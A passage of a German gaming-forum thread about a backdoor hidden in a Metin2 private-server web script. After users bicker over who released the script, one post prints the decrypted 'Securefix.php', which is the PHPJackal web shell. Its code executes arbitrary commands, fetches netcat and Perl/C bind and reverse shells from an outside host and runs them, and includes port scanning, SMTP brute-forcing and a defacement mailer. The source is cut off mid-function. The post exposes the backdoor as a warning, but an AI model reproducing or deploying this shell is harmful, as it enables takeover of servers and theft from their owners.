|
You last visited: Today at 20:09
Advertisement
[HowTo]Backdoor in Script von CADesign entfernen
Discussion on [HowTo]Backdoor in Script von CADesign entfernen within the Metin2 Private Server forum part of the Metin2 category.
08/18/2012, 20:45
|
#31
|
elite*gold: 66
Join Date: Jan 2012
Posts: 234
Received Thanks: 145
|
warum entschuldigst du DICH dan dafür das DU es vergessen hast raus zu nehmen? wen es doch CαnyX
releast hatt....
kann mir das mal einer sagen?
|
|
|
08/18/2012, 20:48
|
#32
|
elite*gold: 0
Join Date: Mar 2012
Posts: 226
Received Thanks: 314
|
Quote:
Originally Posted by killerblümchen1999
Ehm, er verdient schon ordentlich und ehrlich sein Brot, er ist zu reif für
solche Aktionen, bis jetzt ist bei keinem auch etwas wie "Klauerei" aufgetreten.
|
Für seinen angeblichen Alter ist er ganz schön rassistisch gegen Türken daher scheint er gar nicht Reif zur sein.
Quote:
Originally Posted by Λzα
fals ihr es nicht gecheckt habt.. ich bin nicht Aza, und 2. ist es doch nicht versteckt, ist 1 Ordner, und hat einen offensichtlichen datei namen..
|
Hat auch niemand behauptet dass du Aza bist.
|
|
|
08/18/2012, 20:49
|
#33
|
elite*gold: 99
Join Date: Aug 2009
Posts: 4,296
Received Thanks: 5,092
|
Quote:
Originally Posted by PeterWaschLabaschsdu
Für seinen angeblichen Alter ist er ganz schön rassistisch gegen Türken daher scheint er gar nicht Reif zur sein.
|
Kannst du das beweisen?
|
|
|
08/18/2012, 20:51
|
#34
|
elite*gold: 0
Join Date: Mar 2012
Posts: 226
Received Thanks: 314
|
|
|
|
08/18/2012, 20:52
|
#35
|
elite*gold: 66
Join Date: Jan 2012
Posts: 234
Received Thanks: 145
|
Quote:
Originally Posted by PeterWaschLabaschsdu
Für seinen angeblichen Alter ist er ganz schön rassistisch gegen Türken daher scheint er gar nicht Reif zur sein.
Hat auch niemand behauptet dass du Aza bist.
|
dies hatt er aber selber gesagt... er entschuldigt sich für das mit dem script obwohl er ja angeblich nicht aza ist.... aber die HP kahm von CanyX aka Hitaris aka Aza....
warum sollte er sich entschuldigen für einen fehler den Aza gemacht hatt und selber noch sagen das ER es vergessen hat.. wen er es doch garnicht wahr?
mfg
|
|
|
08/18/2012, 20:57
|
#36
|
elite*gold: 0
Join Date: Jan 2012
Posts: 299
Received Thanks: 76
|
Vote 4 Close..
Kindergarten hier.
|
|
|
08/18/2012, 20:58
|
#37
|
elite*gold: 0
Join Date: Jul 2012
Posts: 241
Received Thanks: 107
|
O.o danke!!!!
Der kann über diese Datei den ganzen Webspace übernehmen ;O
Hab sie mir mal angeschaut.
Wie arm....
EDIT:
Hier könnt ihr euch die Datei mal n wenig ansehn:
|
|
|
08/18/2012, 21:00
|
#38
|
elite*gold: 66
Join Date: Jan 2012
Posts: 234
Received Thanks: 145
|
nur so als tipp, mein Antivir (Avast) schlägt aus wen ich auf den link gehe...
|
|
|
08/18/2012, 21:03
|
#39
|
elite*gold: 0
Join Date: Jul 2012
Posts: 241
Received Thanks: 107
|
Quote:
Originally Posted by .Scare™
nur so als tipp, mein Antivir (Avast) schlägt aus wen ich auf den link gehe...
|
Hab jz selbst kein Antivir drauf, aber das ist einfach nur die unveränderte Datei aus dem Original-Thread. Könnte natürlich auch sein das da direkt was drinnen ist ;O
EDIT:
Hier nochmal n Virustotal-Scan von dem Link:
EDIT²:
So, hab hier nochmal den unverschlüsselten Code der Securefix.php:
PHP Code:
#--Config--# $login_password= ''; //Set password #----------# error_reporting(E_ALL); set_time_limit(0); ini_set("max_execution_time","0"); ini_set("memory_limit","9999M"); set_magic_quotes_runtime(0); if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS; if(!isset($_POST))$_POST = &$HTTP_POST_VARS; if(!isset($_GET))$_GET = &$HTTP_GET_VARS; if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS; $_REQUEST = array_merge($_GET, $_POST); if (get_magic_quotes_gpc()){ foreach ($_REQUEST as $key=>$value) { $_REQUEST[$key]=stripslashes($value); } } function hlinK($str=""){ $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF']."?"; $new=explode("&",$str); foreach ($_GET as $key => $v){ $add=1; foreach($new as $m){ $el = explode("=", $m); if ($el[0]==$key)$add=0; } if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; } $ret.=$str; return $ret; } if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); @header("Location: ".hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>"); } if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=@fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=@fsockopen("udp://".$ip,$port); if($scan){ socket_set_timeout($scan,$timeout); @fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if (!function_exists("file_get_contents")){ function file_get_contents($addr){ $a = fopen($addr,"r"); $tmp = fread($a,filesize($a)); fclose($a); if($a)return $tmp; } } if (!function_exists("file_put_contents")){ function file_put_contents($addr,$con){ $a = fopen($addr,"w"); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } } function flusheR(){ flush();@ob_flush(); } if (!empty($_REQUEST['downloaD'])){ @ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header("Content-type: application/octet-stream"); header("Content-disposition: attachment; filename=\"$dl\";"); header("Content-length: ".strlen($con)); echo $con; exit; } if (!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header("Content-type: imagE/gif"); header("Content-length: ".filesize($img)); header("Last-Modified: ".date("r",filemtime($img))); echo file_get_contents($img); exit; } @header("Cache-Control: no-cache, must-revalidate"); @header("Expires: Mon, 7 Aug 1987 05:00:00 GMT"); function showsizE($size){ if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size; } if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; $errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>"; $et = "</td></tr></table>"; $v="1.5"; $msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">"; $intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:?subject=PHPJackal\"></a><br></font>$et</center>"; $footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et"; $hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">"; $t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">"; $crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; function namE(){ $name=''; srand((double)microtime()*100000); for ($i=0;$i<=rand(3,10);$i++){ $name.=chr(rand(97,122)); } return $name; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return "."; } function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; } function downloadiT($get,$put){ $fo=@strtolower(ini_get('allow_url_fopen')); if($fo || $fo=='on')$con=file_get_contents($get); else{ $u=parse_url($get); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $url=fsockopen($host, 80, $en, $es, 12); fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function smtplogiN($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.namE()."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function checksmtP($host,$timeout){ $from=strtolower(namE())."@".strtolower(namE()).".com"; $sock=@fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.namE()."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: <>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function check_urL($url,$method,$search,$timeout){ if(empty($search))$search='200'; $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} while(!feof($sock)){ $res=trim(fgets($sock)); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=namE().namE(); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). $com. chr(0xA0). chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). chr(0x01). chr(0x01). $n. chr(0x05). $n; $sock=@fsockopen("udp://$ip",161); socket_set_timeout($sock,$timeout); @fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); return $res; }
$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} $disablefunctions = @ini_get('disable_functions'); if (!function_exists("str_repeat")){ function str_repeat($str,$c){ $r=""; for($i=0; $i < $cu; $i++)$r.=$str; return $r; } }
function brshelL(){ global $errorbox, $windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/backdoor'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=namE(); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; $c=($_REQUEST['C'])?1:0; if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.=".exe"; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winbind.pl",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl.exe $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.pl",$name); if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winrc.pl",$name); shelL("attrib +H $name"); if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.pl",$name); if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); } } echo "<font color=blue>Done!</font>";} else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}} function showimagE($img){ echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";} function editoR($file){ global $errorbox,$et,$hcwd; if (is_file($file)){ if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";} if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} $data = file_get_contents($file); echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">"; echo htmlspecialchars($data); echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; } else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; } echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>"; } function webshelL(){ global $windows,$hcwd; if($windows){ $alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>"; } else{ $alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>"; if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>"; if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>"; } echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">"; if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>"; } function maileR(){ global $msgbox,$et,$hcwd; $cwd= getcwd(); if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; if (!mail($to,$subject,$body,"From: $from"))break; echo "$msgbox<b>Mail sent!</b><br>$et"; } echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et"; } function scanneR(){ global $hcwd; if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>"; $start=time(); for($i=$from;$i<=$to;$i++){ if($tcp){ if (checkthisporT($target,$i,$timeout)){ $nu++; $ser=""; if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>"; } } if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";} flusheR(); } $time=time()-$start; echo "Done! ($time seconds)</font>"; } elseif (!empty($_REQUEST['securityscanner'])){ echo "<font color=blue>"; $start=time(); $from=$_REQUEST['from']; $to=(int)$_REQUEST['to']; $timeout=(int)$_REQUEST['timeout']; $f = substr($from,strrpos($from,".")+1); $from = substr($from,0,strrpos($from,".")); if(!empty($_REQUEST['httpscanner'])){ echo "Loading webserver bug list..."; flusheR(); $buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>"; flusheR(); }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";} for($i=$f;$i<=$to;$i++){ $output=0; $ip="$from.$i"; if(!empty($_REQUEST['nslookup'])){ $hn=gethostbyaddr($ip); if($hn!=$ip)echo "$ip [$hn]<br>";} flusheR(); if(!empty($_REQUEST['ipscanner'])){ $port=$_REQUEST['port']; if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; $open=$ser=""; foreach($p as $po){ $scan=checkthisporT($ip,$po,$timeout); if ($scan){ $ser=""; if($ser=getservbyport($po,"tcp"))$ser="($ser)"; $open.=" $po$ser "; } } if($open){echo "$ip) Open ports:$open<br>";$output=1;} flusheR(); } if(!empty($_REQUEST['httpbanner'])){ $res=get_sw_namE($ip,$timeout); if($res){ echo "$ip) Webserver software: "; if($res==-1)echo "Unknow"; else echo $res; echo "<br>"; $output=1; } flusheR(); } if(!empty($_REQUEST['httpscanner'])){ if(checkthisporT($ip,80,$timeout) && !empty($file)){ $admin=array('/admin/','/adm/'); $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); foreach ($file as $v){ $vuln=array(); $v=trim($v); if(!$v || $v{0}=='#')continue; $v=str_replace('","','^',$v); $v=str_replace('"','',$v); $vuln=explode('^',$v); $page=$cqich=$nukech=$adminch=$userch=$vuln[1]; if(strstr($page,'@CGIDIRS')) foreach($cgi as $cg){ $cqich=str_replace('@CGIDIRS',$cg,$page); $url="http://$ip$cqich"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} flusheR(); } 